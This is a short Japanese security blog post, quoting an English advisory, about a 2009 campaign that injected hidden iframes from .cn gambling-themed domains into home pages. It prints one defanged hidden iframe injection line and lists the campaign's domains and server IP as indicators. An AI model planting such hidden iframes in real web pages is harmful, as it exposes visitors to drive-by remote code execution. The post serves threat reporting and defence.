zlkon burst out malicious iframes together .cn
一連の zlkon virus(仮称)とは別に進行中の IFRAME injection ですが、こちらもカナリ酷い状況になっています。
Malicious “Income” IFrames from .CN Domains
New week, new leader. I mean various hidden iframes from .cn domains injected at the bottom of home pages.
The html code looks like this
<iframe src="hxxp: //lotmachinesguide .cn/ in.cgi?income56" width=1 height=1 style="visibility: hidden"></iframe>
The domain names may vary but they always end with .cn. The domain names usually contain words lot and bet. They all reside on the same server with the IP address 94 .247 .3 .150. The iframes load pages with paths similar to “in.cgi?incomeNN”, where NN is some arbitrary number.
Here is a list of domains used in this malware campaign:
- lotultimatebet .cn
- lotmachinesguide .cn
- cheapslotplay .cn
- lotultimatebet .cn
- cutlot .cn
- mediahousenameshopfilm .cn
- betbigwager .cn
- namebuypicture .cn
- thelotbet .cn (added: 04.17.2009)
- hotslotpot .cn (added: 04.17.2009)
94 .247 .3 .150
1行削除 *DELETED*
手口は swfや pdfに誘導してリモートコード実行を狙ったものですが、直接 pdf/swfを指定しているものから、phpでリダイレクトしているものまで、バリエーションがあります。
1月ごろは
Gogo2me - Hidden IFrame Injection.
94 .247 .2 .0
こんな感じだったようですので、あまり変わってないようです。
4 月 20th, 2009 at 11:04 AM
[...] どこが引っかかってるか調べてみると・・・ zlkon burst out malicious iframes together .cn コレらしい・・ ひょっとして?コレ?(苦笑) & l t ; <iframe [...]